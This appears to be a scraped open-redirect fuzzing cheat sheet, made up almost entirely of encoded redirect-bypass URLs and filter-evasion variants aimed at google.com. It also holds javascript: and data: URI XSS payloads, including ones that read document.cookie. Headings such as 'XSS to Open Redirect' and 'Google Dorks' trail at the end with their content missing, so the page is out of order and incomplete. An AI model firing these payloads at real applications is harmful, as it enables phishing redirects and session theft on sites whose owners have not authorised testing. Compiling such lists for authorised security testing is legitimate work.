////google.com/%2e%2e%2f ////example.com@google.com/%2e%2e%2f https://google.com/%2e%2e%2f https://example.com@google.com/%2e%2e%2f //https://google.com/%2e%2e%2f //https://example.com@google.com/%2e%2e%2f ///google.com/%2e%2e ///example.com@google.com/%2e%2e ////google.com/%2e%2e ////example.com@google.com/%2e%2e https:///google.com/%2e%2e https:///example.com@google.com/%2e%2e //https:///google.com/%2e%2e //example.com@https:///google.com/%2e%2e /https://google.com/%2e%2e /https://example.com@google.com/%2e%2e ///google.com/%2f%2e%2e ///example.com@google.com/%2f%2e%2e ////google.com/%2f%2e%2e ////example.com@google.com/%2f%2e%2e https:///google.com/%2f%2e%2e https:///example.com@google.com/%2f%2e%2e /https://google.com/%2f%2e%2e /https://example.com@google.com/%2f%2e%2e /https:///google.com/%2f%2e%2e /https:///example.com@google.com/%2f%2e%2e /%09/google.com /%09/example.com@google.com //%09/google.com //%09/example.com@google.com ///%09/google.com ///%09/example.com@google.com ////%09/google.com ////%09/example.com@google.com https://%09/google.com https://%09/example.com@google.com /%5cgoogle.com /%5cexample.com@google.com //%5cgoogle.com //%5cexample.com@google.com ///%5cgoogle.com ///%5cexample.com@google.com ////%5cgoogle.com ////%5cexample.com@google.com https://%5cgoogle.com https://%5cexample.com@google.com /https://%5cgoogle.com /https://%5cexample.com@google.com https://google.com https://example.com@google.com javascript:alert(1); javascript:alert(1) //javascript:alert(1); /javascript:alert(1); //javascript:alert(1) /javascript:alert(1) /%5cjavascript:alert(1); /%5cjavascript:alert(1) //%5cjavascript:alert(1); //%5cjavascript:alert(1) /%09/javascript:alert(1); /%09/javascript:alert(1) java%0d%0ascript%0d%0a:alert(0) //google.com https:google.com //google%E3%80%82com \/\/google.com/ /\/google.com/ //google%00.com https://example.com/https://google.com/ ";alert(0);// javascript://example.com?%a0alert%281%29 http://0xd8.0x3a.0xd6.0xce http://example.com@0xd8.0x3a.0xd6.0xce http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce http://0xd83ad6ce http://example.com@0xd83ad6ce http://3H6k7lIAiqjfNeN@0xd83ad6ce http://XY>.7d8T\205pZM@0xd83ad6ce http://3627734734 http://example.com@3627734734 http://3H6k7lIAiqjfNeN@3627734734 http://XY>.7d8T\205pZM@3627734734 http://472.314.470.462 http://example.com@472.314.470.462 http://3H6k7lIAiqjfNeN@472.314.470.462 http://XY>.7d8T\205pZM@472.314.470.462 http://0330.072.0326.0316 http://example.com@0330.072.0326.0316 http://3H6k7lIAiqjfNeN@0330.072.0326.0316 http://XY>.7d8T\205pZM@0330.072.0326.0316 http://00330.00072.0000326.00000316 http://example.com@00330.00072.0000326.00000316 http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 http://XY>.7d8T\205pZM@00330.00072.0000326.00000316 http://[::216.58.214.206] http://example.com@[::216.58.214.206] http://3H6k7lIAiqjfNeN@[::216.58.214.206] http://XY>.7d8T\205pZM@[::216.58.214.206] http://[::ffff:216.58.214.206] http://example.com@[::ffff:216.58.214.206] http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] http://0xd8.072.54990 http://example.com@0xd8.072.54990 http://3H6k7lIAiqjfNeN@0xd8.072.54990 http://XY>.7d8T\205pZM@0xd8.072.54990 http://0xd8.3856078 http://example.com@0xd8.3856078 http://3H6k7lIAiqjfNeN@0xd8.3856078 http://XY>.7d8T\205pZM@0xd8.3856078 http://00330.3856078 http://example.com@00330.3856078 http://3H6k7lIAiqjfNeN@00330.3856078 http://XY>.7d8T\205pZM@00330.3856078 http://00330.0x3a.54990 http://example.com@00330.0x3a.54990 http://3H6k7lIAiqjfNeN@00330.0x3a.54990 http://XY>.7d8T\205pZM@00330.0x3a.54990 http:0xd8.0x3a.0xd6.0xce http:example.com@0xd8.0x3a.0xd6.0xce http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce http:0xd83ad6ce http:example.com@0xd83ad6ce http:3H6k7lIAiqjfNeN@0xd83ad6ce http:XY>.7d8T\205pZM@0xd83ad6ce http:3627734734 http:example.com@3627734734 http:3H6k7lIAiqjfNeN@3627734734 http:XY>.7d8T\205pZM@3627734734 http:472.314.470.462 http:example.com@472.314.470.462 http:3H6k7lIAiqjfNeN@472.314.470.462 http:XY>.7d8T\205pZM@472.314.470.462 http:0330.072.0326.0316 http:example.com@0330.072.0326.0316 http:3H6k7lIAiqjfNeN@0330.072.0326.0316 http:XY>.7d8T\205pZM@0330.072.0326.0316 http:00330.00072.0000326.00000316 http:example.com@00330.00072.0000326.00000316 http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 http:XY>.7d8T\205pZM@00330.00072.0000326.00000316 http:[::216.58.214.206] http:example.com@[::216.58.214.206] http:3H6k7lIAiqjfNeN@[::216.58.214.206] http:XY>.7d8T\205pZM@[::216.58.214.206] http:[::ffff:216.58.214.206] http:example.com@[::ffff:216.58.214.206] http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] http:XY>.7d8T\205pZM@[::ffff:216.58.214.206] http:0xd8.072.54990 http:example.com@0xd8.072.54990 http:3H6k7lIAiqjfNeN@0xd8.072.54990 http:XY>.7d8T\205pZM@0xd8.072.54990 http:0xd8.3856078 http:example.com@0xd8.3856078 http:3H6k7lIAiqjfNeN@0xd8.3856078 http:XY>.7d8T\205pZM@0xd8.3856078 http:00330.3856078 http:example.com@00330.3856078 http:3H6k7lIAiqjfNeN@00330.3856078 http:XY>.7d8T\205pZM@00330.3856078 http:00330.0x3a.54990 http:example.com@00330.0x3a.54990 http:3H6k7lIAiqjfNeN@00330.0x3a.54990 http:XY>.7d8T\205pZM@00330.0x3a.54990 〱google.com 〵google.com ゝgoogle.com ーgoogle.com ｰgoogle.com /〱google.com /〵google.com /ゝgoogle.com /ーgoogle.com /ｰgoogle.com %68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d http://%67%6f%6f%67%6c%65%2e%63%6f%6d <>javascript:alert(1); <>//google.com //google.com\@example.com https://:@google.com\@example.com \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1) \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1) ja\nva\tscript\r:alert(1) \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) \152\141\166\141\163\143\162\151\160\164\072alert(1) http://google.com:80#@example.com/ http://google.com:80?@example.com/ http://3H6k7lIAiqjfNeN@example.com+@google.com/ http://XY>.7d8T\205pZM@example.com+@google.com/ http://3H6k7lIAiqjfNeN@example.com@google.com/ http://XY>.7d8T\205pZM@example.com@google.com/ http://example.com+&@google.com#+@example.com/ http://google.com\texample.com/ //google.com:80#@example.com/ //google.com:80?@example.com/ //3H6k7lIAiqjfNeN@example.com+@google.com/ //XY>.7d8T\205pZM@example.com+@google.com/ //3H6k7lIAiqjfNeN@example.com@google.com/ //XY>.7d8T\205pZM@example.com@google.com/ //example.com+&@google.com#+@example.com/ //google.com\texample.com/ //;@google.com http://;@google.com @google.com javascript://https://example.com/?z=%0Aalert(1) data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4= http://google.com%2f%2f.example.com/ http://google.com%5c%5c.example.com/ http://google.com%3F.example.com/ http://google.com%23.example.com/ http://example.com:80%40google.com/ http://example.com%2egoogle.com/ /x:1/:///%01javascript:alert(document.cookie)/ /https:/%5cgoogle.com/ javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie) /http://google.com /%2f%2fgoogle.com /google.com/%2f%2e%2e /http:/google.com /.google.com ///\;@google.com ///google.com /////google.com/

hashtagXSS to Open Redirect

hashtagSQLI to Open Redirect

hashtagSample

hashtagMethod 1

hashtagMethod 2

hashtagGoogle Dorks to find open redirects:

hashtag-----------------------------------------------------------

hashtagPayloads to FUZZ open redirects: